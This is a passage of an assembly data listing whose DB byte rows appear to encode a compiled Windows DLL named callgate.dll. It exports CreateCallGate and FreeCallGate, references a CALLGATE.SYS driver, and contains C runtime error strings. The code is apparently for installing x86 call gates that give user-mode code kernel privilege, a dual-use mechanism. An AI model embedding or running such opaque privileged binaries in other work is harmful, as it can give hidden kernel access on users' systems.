DB 004H,001H,074H,02CH,056H,0BFH,000H,000H,000H,000H,0E8H,0A2H,005H,000H,000H
DB 083H,0C4H,004H,050H,0FFH,015H,0E8H,0C1H,000H,010H,085H,0C0H,075H,008H,0FFH
DB 015H,048H,0C1H,000H,010H,08BH,0F8H,085H,0FFH,074H,017H,0E8H,0D3H,004H,000H
DB 000H,089H,038H,0BFH,0FFH,0FFH,0FFH,0FFH,0E8H,0B7H,004H,000H,000H,0C7H,000H
DB 009H,000H,000H,000H,056H,0E8H,02BH,006H,000H,000H,083H,0C4H,004H,08BH,0C7H
DB 05FH,05EH,05BH,0C3H,0E8H,09DH,004H,000H,000H,05FH,0C7H,000H,009H,000H,000H
DB 000H,0B8H,0FFH,0FFH,0FFH,0FFH,05EH,05BH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,056H,057H,08BH,074H,024H,00CH,039H
DB 035H,020H,0B4H,000H,010H,076H,04CH,08BH,0C6H,08BH,0CEH,083H,0E0H,0E7H,083H
DB 0E1H,01FH,0C1H,0F8H,003H,0C1H,0E1H,002H,08BH,090H,030H,0B4H,000H,010H,08DH
DB 004H,0C9H,0F6H,044H,002H,004H,001H,074H,02CH,056H,0E8H,05CH,005H,000H,000H
DB 08BH,044H,024H,018H,08BH,04CH,024H,014H,083H,0C4H,004H,050H,051H,056H,0E8H
DB 039H,000H,000H,000H,083H,0C4H,00CH,08BH,0F8H,056H,0E8H,0AEH,005H,000H,000H
DB 083H,0C4H,004H,08BH,0C7H,05FH,05EH,0C3H,0E8H,021H,004H,000H,000H,0C7H,000H
DB 009H,000H,000H,000H,0E8H,026H,004H,000H,000H,05FH,0C7H,000H,000H,000H,000H
DB 000H,0B8H,0FFH,0FFH,0FFH,0FFH,05EH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,081H,0ECH,018H,004H,000H,000H,053H,056H,057H,055H,033H,0FFH,08BH,0ACH
DB 024H,034H,004H,000H,000H,089H,07CH,024H,020H,03BH,0EFH,075H,00DH,033H,0C0H
DB 05DH,05FH,05EH,05BH,081H,0C4H,018H,004H,000H,000H,0C3H,08BH,094H,024H,02CH
DB 004H,000H,000H,08BH,0C2H,083H,0E0H,0E7H,0C1H,0F8H,003H,005H,030H,0B4H,000H
DB 010H,089H,044H,024H,018H,08BH,0C2H,083H,0E0H,01FH,08BH,05CH,024H,018H,0C1H
DB 0E0H,002H,08DH,00CH,0C0H,08BH,003H,089H,04CH,024H,01CH,0F6H,044H,008H,004H
DB 020H,074H,00DH,06AH,002H,06AH,000H,052H,0E8H,04AH,005H,000H,000H,083H,0C4H
DB 00CH,08BH,044H,024H,018H,08BH,04CH,024H,01CH,003H,008H,0F6H,041H,004H,080H
DB 00FH,084H,088H,000H,000H,000H,0C7H,044H,024H,010H,000H,000H,000H,000H,08BH
DB 09CH,024H,030H,004H,000H,000H,08BH,0C3H,02BH,084H,024H,030H,004H,000H,000H
DB 03BH,0C5H,00FH,083H,0A1H,000H,000H,000H,08DH,074H,024H,024H,08BH,0C3H,02BH
DB 084H,024H,030H,004H,000H,000H,03BH,0C5H,073H,01EH,08AH,003H,043H,03CH,00AH
DB 075H,005H,0C6H,006H,00DH,047H,046H,088H,006H,046H,08BH,0C6H,08DH,04CH,024H
DB 024H,02BH,0C1H,03DH,000H,004H,000H,000H,07CH,0D5H,08DH,044H,024H,024H,06AH
DB 000H,02BH,0F0H,08DH,04CH,024H,028H,08DH,044H,024H,018H,08BH,054H,024H,01CH
DB 050H,056H,051H,08BH,002H,08BH,04CH,024H,02CH,08BH,014H,008H,052H,0FFH,015H
DB 0CCH,0C1H,000H,010H,085H,0C0H,074H,03DH,08BH,044H,024H,014H,001H,044H,024H
DB 020H,03BH,0C6H,07DH,089H,0EBH,039H,08DH,044H,024H,014H,06AH,000H,08BH,094H
DB 024H,034H,004H,000H,000H,050H,055H,08BH,009H,052H,051H,0FFH,015H,0CCH,0C1H
DB 000H,010H,085H,0C0H,074H,012H,0C7H,044H,024H,010H,000H,000H,000H,000H,08BH
DB 044H,024H,014H,089H,044H,024H,020H,0EBH,00AH,0FFH,015H,048H,0C1H,000H,010H
DB 089H,044H,024H,010H,083H,07CH,024H,020H,000H,00FH,085H,0A1H,000H,000H,000H
DB 083H,07CH,024H,010H,000H,074H,04AH,083H,07CH,024H,010H,005H,075H,026H,0E8H
DB 0A4H,002H,000H,000H,0C7H,000H,009H,000H,000H,000H,0E8H,0A9H,002H,000H,000H
DB 08BH,04CH,024H,010H,05DH,05FH,089H,008H,0B8H,0FFH,0FFH,0FFH,0FFH,05EH,05BH
DB 081H,0C4H,018H,004H,000H,000H,0C3H,08BH,04CH,024H,010H,051H,0E8H,0F9H,001H
DB 000H,000H,083H,0C4H,004H,0B8H,0FFH,0FFH,0FFH,0FFH,05DH,05FH,05EH,05BH,081H
DB 0C4H,018H,004H,000H,000H,0C3H,08BH,044H,024H,018H,08BH,04CH,024H,01CH,08BH
DB 010H,0F6H,044H,00AH,004H,040H,074H,019H,08BH,084H,024H,030H,004H,000H,000H
DB 080H,038H,01AH,075H,00DH,033H,0C0H,05DH,05FH,05EH,05BH,081H,0C4H,018H,004H
DB 000H,000H,0C3H,0E8H,037H,002H,000H,000H,0C7H,000H,01CH,000H,000H,000H,0E8H
DB 03CH,002H,000H,000H,05DH,0C7H,000H,000H,000H,000H,000H,0B8H,0FFH,0FFH,0FFH
DB 0FFH,05FH,05EH,05BH,081H,0C4H,018H,004H,000H,000H,0C3H,08BH,044H,024H,020H
DB 05DH,02BH,0C7H,05FH,05EH,05BH,081H,0C4H,018H,004H,000H,000H,0C3H,0CCH,0CCH
DB 0CCH,0CCH,0CCH,055H,08BH,0ECH,057H,056H,08BH,07DH,008H,08BH,0D7H,033H,0C0H
DB 083H,0C9H,0FFH,0F2H,0AEH,04FH,08BH,0F7H,08BH,07DH,00CH,057H,08BH,04DH,010H
DB 0F2H,0AEH,075H,001H,041H,02BH,04DH,010H,0F7H,0D9H,08BH,0FEH,05EH,0F3H,0A4H
DB 0AAH,08BH,0C2H,05EH,05FH,0C9H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,056H,057H,08BH,074H,024H,00CH,039H,035H
DB 020H,0B4H,000H,010H,076H,042H,08BH,0C6H,08BH,0CEH,083H,0E0H,0E7H,083H,0E1H
DB 01FH,0C1H,0F8H,003H,0C1H,0E1H,002H,08BH,090H,030H,0B4H,000H,010H,08DH,004H
DB 0C9H,0F6H,044H,002H,004H,001H,074H,022H,056H,0E8H,09CH,002H,000H,000H,083H
DB 0C4H,004H,056H,0E8H,033H,000H,000H,000H,083H,0C4H,004H,08BH,0F8H,056H,0E8H
DB 0F8H,002H,000H,000H,083H,0C4H,004H,08BH,0C7H,05FH,05EH,0C3H,0E8H,06BH,001H
DB 000H,000H,0C7H,000H,009H,000H,000H,000H,0E8H,070H,001H,000H,000H,05FH,0C7H
DB 000H,000H,000H,000H,000H,0B8H,0FFH,0FFH,0FFH,0FFH,05EH,0C3H,0CCH,0CCH,056H
DB 057H,08BH,074H,024H,00CH,083H,0FEH,001H,074H,005H,083H,0FEH,002H,075H,01AH
DB 06AH,002H,0E8H,0F9H,001H,000H,000H,083H,0C4H,004H,08BH,0F8H,06AH,001H,0E8H
DB 0EDH,001H,000H,000H,083H,0C4H,004H,03BH,0F8H,074H,01EH,056H,0E8H,0E0H,001H
DB 000H,000H,083H,0C4H,004H,050H,0FFH,015H,090H,0C1H,000H,010H,085H,0C0H,075H
DB 00AH,0FFH,015H,048H,0C1H,000H,010H,08BH,0F8H,0EBH,002H,033H,0FFH,056H,0E8H
DB 020H,001H,000H,000H,083H,0C4H,004H,085H,0FFH,074H,011H,057H,0E8H,073H,000H
DB 000H,000H,083H,0C4H,004H,0B8H,0FFH,0FFH,0FFH,0FFH,05FH,05EH,0C3H,08BH,0C6H
DB 083H,0E6H,01FH,0C1H,0E6H,002H,083H,0E0H,0E7H,0C1H,0F8H,003H,05FH,08BH,088H
DB 030H,0B4H,000H,010H,08DH,004H,0F6H,05EH,0C6H,044H,001H,004H,000H,033H,0C0H
DB 0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,056H,08BH,074H,024H,008H,08BH,046H
DB 00CH,0A8H,083H,074H,02BH,0A8H,008H,074H,027H,08BH,046H,008H,050H,0E8H,017H
DB 0F6H,0FFH,0FFH,083H,0C4H,004H,0C7H,006H,000H,000H,000H,000H,081H,066H,00CH
DB 0F7H,0FBH,0FFH,0FFH,0C7H,046H,008H,000H,000H,000H,000H,0C7H,046H,004H,000H
DB 000H,000H,000H,05EH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,056H,0E8H,08AH
DB 000H,000H,000H,08BH,04CH,024H,008H,033H,0F6H,089H,008H,0B8H,000H,05BH,000H
DB 010H,039H,008H,074H,022H,083H,0C0H,008H,046H,03DH,068H,05CH,000H,010H,072H
DB 0F1H,083H,0F9H,013H,072H,022H,083H,0F9H,024H,077H,01DH,0E8H,04FH,000H,000H
DB 000H,05EH,0C7H,000H,00DH,000H,000H,000H,0C3H,0E8H,042H,000H,000H,000H,08BH
DB 00CH,0F5H,004H,05BH,000H,010H,05EH,089H,008H,0C3H,081H,0F9H,0BCH,000H,000H
DB 000H,072H,015H,081H,0F9H,0CAH,000H,000H,000H,077H,00DH,0E8H,022H,000H,000H
DB 000H,05EH,0C7H,000H,008H,000H,000H,000H,0C3H,0E8H,015H,000H,000H,000H,05EH
DB 0C7H,000H,016H,000H,000H,000H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0E8H,00BH,0E5H,0FFH,0FFH,083H,0C0H,008H,0C3H,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0E8H,0FBH,0E4H,0FFH,0FFH,083H,0C0H,00CH,0C3H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,04CH,024H,004H,056H,057H,039H,00DH
DB 020H,0B4H,000H,010H,076H,065H,08BH,0C1H,083H,0E0H,0E7H,0C1H,0F8H,003H,08DH
DB 0B8H,030H,0B4H,000H,010H,08BH,0C1H,083H,0E0H,01FH,0C1H,0E0H,002H,08DH,034H
DB 0C0H,08BH,007H,003H,0C6H,0F6H,040H,004H,001H,074H,042H,083H,038H,0FFH,074H
DB 03DH,083H,03DH,070H,050H,000H,010H,001H,075H,026H,085H,0C9H,074H,00CH,083H
DB 0F9H,001H,074H,00DH,083H,0F9H,002H,074H,00EH,0EBH,016H,06AH,000H,06AH,0F6H
DB 0EBH,00AH,06AH,000H,06AH,0F5H,0EBH,004H,06AH,000H,06AH,0F4H,0FFH,015H,0A8H
DB 0C1H,000H,010H,08BH,007H,05FH,0C7H,004H,030H,0FFH,0FFH,0FFH,0FFH,033H,0C0H
DB 05EH,0C3H,0E8H,068H,0FFH,0FFH,0FFH,0C7H,000H,009H,000H,000H,000H,0E8H,06DH
DB 0FFH,0FFH,0FFH,05FH,0C7H,000H,000H,000H,000H,000H,0B8H,0FFH,0FFH,0FFH,0FFH
DB 05EH,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,08BH,04CH,024H,004H,039H,00DH,020H,0B4H,000H,010H,076H,022H,08BH
DB 0C1H,083H,0E1H,01FH,0C1H,0E1H,002H,083H,0E0H,0E7H,0C1H,0F8H,003H,08DH,014H
DB 0C9H,08BH,080H,030H,0B4H,000H,010H,003H,0C2H,0F6H,040H,004H,001H,074H,003H
DB 08BH,000H,0C3H,0E8H,00DH,0FFH,0FFH,0FFH,0C7H,000H,009H,000H,000H,000H,0E8H
DB 012H,0FFH,0FFH,0FFH,0C7H,000H,000H,000H,000H,000H,0B8H,0FFH,0FFH,0FFH,0FFH
DB 0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH,044H,024H,004H,053H,056H,08BH,0C8H
DB 057H,083H,0E1H,0E7H,0C1H,0F9H,003H,083H,0E0H,01FH,0C1H,0E0H,002H,08DH,0B9H
DB 030H,0B4H,000H,010H,08DH,034H,0C0H,08BH,01FH,003H,0DEH,083H,07BH,008H,000H
DB 075H,027H,06AH,011H,0E8H,061H,0F2H,0FFH,0FFH,083H,0C4H,004H,083H,07BH,008H
DB 000H,075H,00DH,08DH,043H,00CH,050H,0FFH,015H,0D0H,0C1H,000H,010H,0FFH,043H
DB 008H,06AH,011H,0E8H,0B4H,0F2H,0FFH,0FFH,083H,0C4H,004H,08BH,007H,003H,0C6H
DB 083H,0C0H,00CH,050H,0FFH,015H,0D4H,0C1H,000H,010H,05FH,05EH,05BH,0C3H,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,08BH
DB 04CH,024H,004H,08BH,0C1H,083H,0E1H,01FH,0C1H,0E1H,002H,083H,0E0H,0E7H,0C1H
DB 0F8H,003H,08DH,014H,0C9H,08BH,080H,030H,0B4H,000H,010H,003H,0C2H,083H,0C0H
DB 00CH,050H,0FFH,015H,0D8H,0C1H,000H,010H,0C3H,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,056H,057H,08BH,074H,024H,00CH,056H,0E8H,004H,0FFH,0FFH,0FFH,083H
DB 0C4H,004H,083H,0F8H,0FFH,075H,013H,0E8H,037H,0FEH,0FFH,0FFH,05FH,0C7H,000H
DB 009H,000H,000H,000H,0B8H,0FFH,0FFH,0FFH,0FFH,05EH,0C3H,08BH,04CH,024H,014H
DB 08BH,054H,024H,010H,051H,06AH,000H,052H,050H,0FFH,015H,0ACH,0C1H,000H,010H
DB 083H,0F8H,0FFH,08BH,0F8H,0B8H,000H,000H,000H,000H,075H,006H,0FFH,015H,048H
DB 0C1H,000H,010H,085H,0C0H,074H,011H,050H,0E8H,07AH,0FDH,0FFH,0FFH,083H,0C4H
DB 004H,0B8H,0FFH,0FFH,0FFH,0FFH,05FH,05EH,0C3H,08BH,0C6H,083H,0E6H,01FH,0C1H
DB 0E6H,002H,083H,0E0H,0E7H,0C1H,0F8H,003H,08BH,088H,030H,0B4H,000H,010H,08DH
DB 004H,0F6H,080H,064H,001H,004H,0FDH,08BH,0C7H,05FH,05EH,0C3H,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,053H,056H,08BH,044H
DB 024H,018H,00BH,0C0H,075H,018H,08BH,04CH,024H,014H,08BH,044H,024H,010H,033H
DB 0D2H,0F7H,0F1H,08BH,0D8H,08BH,044H,024H,00CH,0F7H,0F1H,08BH,0D3H,0EBH,041H
DB 08BH,0C8H,08BH,05CH,024H,014H,08BH,054H,024H,010H,08BH,044H,024H,00CH,0D1H
DB 0E9H,0D1H,0DBH,0D1H,0EAH,0D1H,0D8H,00BH,0C9H,075H,0F4H,0F7H,0F3H,08BH,0F0H
DB 0F7H,064H,024H,018H,08BH,0C8H,08BH,044H,024H,014H,0F7H,0E6H,003H,0D1H,072H
DB 00EH,03BH,054H,024H,010H,077H,008H,072H,007H,03BH,044H,024H,00CH,076H,001H
DB 04EH,033H,0D2H,08BH,0C6H,05EH,05BH,0C2H,010H,000H,0CCH,0CCH,0CCH,0CCH,0CCH
DB 0CCH,0CCH,0CCH,053H,08BH,044H,024H,014H,00BH,0C0H,075H,018H,08BH,04CH,024H
DB 010H,08BH,044H,024H,00CH,033H,0D2H,0F7H,0F1H,08BH,044H,024H,008H,0F7H,0F1H
DB 08BH,0C2H,033H,0D2H,0EBH,050H,08BH,0C8H,08BH,05CH,024H,010H,08BH,054H,024H
DB 00CH,08BH,044H,024H,008H,0D1H,0E9H,0D1H,0DBH,0D1H,0EAH,0D1H,0D8H,00BH,0C9H
DB 075H,0F4H,0F7H,0F3H,08BH,0C8H,0F7H,064H,024H,014H,091H,0F7H,064H,024H,010H
DB 003H,0D1H,072H,00EH,03BH,054H,024H,00CH,077H,008H,072H,00EH,03BH,044H,024H
DB 008H,076H,008H,02BH,044H,024H,010H,01BH,054H,024H,014H,02BH,044H,024H,008H
DB 01BH,054H,024H,00CH,0F7H,0DAH,0F7H,0D8H,083H,0DAH,000H,05BH,0C2H,010H,000H
DB 0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,0CCH,06AH,002H,0E8H,0B9H
DB 0DFH,0FFH,0FFH,083H,0C4H,004H,0C3H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 006H,000H,000H,006H,000H,001H,000H,000H,010H,000H,003H,006H,000H,006H,002H
DB 010H,004H,045H,045H,045H,005H,005H,005H,005H,005H,035H,030H,000H,050H,000H
DB 000H,000H,000H,020H,028H,038H,050H,058H,007H,008H,000H,037H,030H,030H,057H
DB 050H,007H,000H,000H,020H,020H,008H,000H,000H,000H,000H,008H,060H,060H,060H
DB 060H,060H,060H,000H,000H,070H,070H,078H,078H,078H,078H,008H,007H,008H,000H
DB 000H,007H,000H,008H,008H,008H,000H,000H,008H,000H,008H,000H,000H,008H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,0E1H,08EH,063H,033H,000H
DB 000H,000H,000H,09CH,040H,000H,000H,001H,000H,000H,000H,002H,000H,000H,000H
DB 002H,000H,000H,000H,088H,040H,000H,000H,090H,040H,000H,000H,098H,040H,000H
DB 000H,000H,010H,000H,000H,040H,011H,000H,000H,0A9H,040H,000H,000H,0BCH,040H
DB 000H,000H,000H,000H,001H,000H,063H,061H,06CH,06CH,067H,061H,074H,065H,02EH
DB 064H,06CH,06CH,000H,05FH,043H,072H,065H,061H,074H,065H,043H,061H,06CH,06CH
DB 047H,061H,074H,065H,040H,031H,032H,000H,05FH,046H,072H,065H,065H,043H,061H
DB 06CH,06CH,047H,061H,074H,065H,040H,034H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,070H
DB 02BH,000H,010H,000H,000H,000H,000H,000H,000H,000H,000H,040H,02CH,000H,010H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,063H,061H,06CH,06CH,067H,061H,074H,065H,000H,000H
DB 000H,000H,030H,050H,000H,010H,043H,041H,04CH,04CH,047H,041H,054H,045H,02EH
DB 053H,059H,053H,000H,000H,000H,000H,05CH,000H,000H,000H,05CH,05CH,02EH,05CH
DB 025H,073H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,0F0H,017H,000H,010H,000H,000H,000H,000H,000H,000H,000H,000H,049H,073H
DB 054H,04EH,054H,000H,000H,000H,06BH,065H,072H,06EH,065H,06CH,033H,032H,02EH
DB 064H,06CH,06CH,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,0FFH,0FFH,0FFH,0FFH
DB 000H,010H,000H,000H,000H,000H,000H,000H,0FFH,0FFH,0FFH,0FFH,000H,00AH,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,001H,002H,004H,008H,000H,000H,000H,000H,0A4H
DB 003H,000H,000H,060H,082H,079H,082H,021H,000H,000H,000H,000H,000H,000H,000H
DB 0A6H,0DFH,000H,000H,000H,000H,000H,000H,0A1H,0A5H,000H,000H,000H,000H,000H
DB 000H,081H,09FH,0E0H,0FCH,000H,000H,000H,000H,040H,07EH,080H,0FCH,000H,000H
DB 000H,000H,0A8H,003H,000H,000H,0C1H,0A3H,0DAH,0A3H,020H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,081H,0FEH,000H,000H,000H,000H,000H,000H,040H,0FEH,000H
DB 000H,000H,000H,000H,000H,0B5H,003H,000H,000H,0C1H,0A3H,0DAH,0A3H,020H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,081H,0FEH,000H,000H,000H,000H,000H,000H
DB 041H,0FEH,000H,000H,000H,000H,000H,000H,0B6H,003H,000H,000H,0CFH,0A2H,0E4H
DB 0A2H,01AH,000H,0E5H,0A2H,0E8H,0A2H,05BH,000H,000H,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,081H,0FEH,000H,000H,000H
DB 000H,000H,000H,040H,07EH,0A1H,0FEH,000H,000H,000H,000H,051H,005H,000H,000H
DB 051H,0DAH,05EH,0DAH,020H,000H,05FH,0DAH,06AH,0DAH,032H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,000H,081H,0D3H
DB 0D8H,0DEH,0E0H,0F9H,000H,000H,031H,07EH,081H,0FEH,000H,000H,000H,000H,000H
DB 000H,000H,000H,000H,000H,000H,000H,072H,075H,06EH,074H,069H,06DH,065H,020H
DB 065H,072H,072H,06FH,072H,020H,000H,000H,00DH,00AH,000H,000H,054H,04CH,04FH
DB 053H,053H,020H,065H,072H,072H,06FH,072H,00DH,00AH,000H,000H,000H,053H,049H
DB 04EH,047H,020H,065H,072H,072H,06FH,072H,00DH,00AH,000H,000H,000H,000H,044H
DB 04FH,04DH,041H,049H,04EH,020H,065H,072H,072H,06FH,072H,00DH,00AH,000H,000H
DB 052H,036H,030H,032H,037H,00DH,00AH,02DH,020H,06EH,06FH,074H,020H,065H,06EH
DB 06FH,075H,067H,068H,020H,073H,070H,061H,063H,065H,020H,066H,06FH,072H,020H
DB 06CH,06FH,077H,069H,06FH,020H,069H,06EH,069H,074H,069H,061H,06CH,069H,07AH
DB 061H,074H,069H,06FH,06EH,00DH,00AH,000H,000H,000H,000H,052H,036H,030H,032H
DB 036H,00DH,00AH,02DH,020H,06EH,06FH,074H,020H,065H,06EH,06FH,075H,067H,068H
DB 020H,073H,070H,061H,063H,065H,020H,066H,06FH,072H,020H,073H,074H,064H,069H
DB 06FH,020H,069H,06EH,069H,074H,069H,061H,06CH,069H,07AH,061H,074H,069H,06FH
DB 06EH,00DH,00AH,000H,000H,000H,000H,052H,036H,030H,032H,035H,00DH,00AH,02DH
DB 020H,070H,075H,072H,065H,020H,076H,069H,072H,074H,075H,061H,06CH,020H,066H
DB 075H,06EH,063H,074H,069H,06FH,06EH,020H,063H,061H,06CH,06CH,00DH,00AH,000H
DB 000H,000H,052H,036H,030H,032H,034H,00DH,00AH,02DH,020H,06EH,06FH,074H,020H
DB 065H,06EH,06FH,075H,067H,068H,020H,073H,070H,061H,063H,065H,020H,066H,06FH
DB 072H,020H,05FH,06FH,06EH,065H,078H,069H,074H,02FH,061H,074H,065H,078H,069H
DB 074H,020H,074H,061H,062H,06CH,065H,00DH,00AH,000H,000H,000H,000H,052H,036H
DB 030H,031H,039H,00DH,00AH,02DH,020H,075H,06EH,061H,062H,06CH,065H,020H,074H
DB 06FH,020H,06FH,070H,065H,06EH,020H,063H,06FH,06EH,073H,06FH,06CH,065H,020H
DB 064H,065H,076H,069H,063H,065H,00DH,00AH,000H,000H,000H,000H,052H,036H,030H
DB 031H,038H,00DH,00AH,02DH,020H,075H,06EH,065H,078H,070H,065H,063H,074H,065H
DB 064H,020H,068H,065H,061H,070H,020H,065H,072H,072H,06FH,072H,00DH,00AH,000H
DB 000H,000H,000H,052H,036H,030H,031H,037H,00DH,00AH,02DH,020H,075H,06EH,065H
DB 078H,070H,065H,063H,074H,065H,064H,020H,06DH,075H,06CH,074H,069H,074H,068H
DB 072H,065H,061H,064H,020H,06CH,06FH,063H,06BH,020H,065H,072H,072H,06FH,072H
DB 00DH,00AH,000H,000H,000H,000H,052H,036H,030H,031H,036H,00DH,00AH,02DH,020H
DB 06EH,06FH,074H,020H,065H,06EH,06FH,075H,067H,068H,020H,073H,070H,061H,063H
DB 065H,020H,066H,06FH,072H,020H,074H,068H,072H,065H,061H,064H,020H,064H,061H
DB 074H,061H,00DH,00AH,000H,00DH,00AH,061H,062H,06EH,06FH,072H,06DH,061H,06CH
DB 020H,070H,072H,06FH,067H,072H,061H,06DH,020H,074H,065H,072H,06DH,069H,06EH
DB 061H,074H,069H,06FH,06EH,00DH,00AH,000H,000H,000H,000H,052H,036H,030H,030H
DB 039H,00DH,00AH,02DH,020H,06EH,06FH,074H,020H,065H,06EH,06FH,075H,067H,068H
DB 020H,073H,070H,061H,063H,065H,020H,066H,06FH,072H,020H,065H,06EH,076H,069H
DB 072H,06FH,06EH,06DH,065H,06EH,074H,00DH,00AH,000H,052H,036H,030H,030H,038H
DB 00DH,00AH,02DH,020H,06EH,06FH,074H,020H,065H,06EH,06FH,075H,067H,068H,020H
DB 073H,070H,061H,063H,065H,020H,066H,06FH,072H,020H,061H,072H,067H,075H,06DH
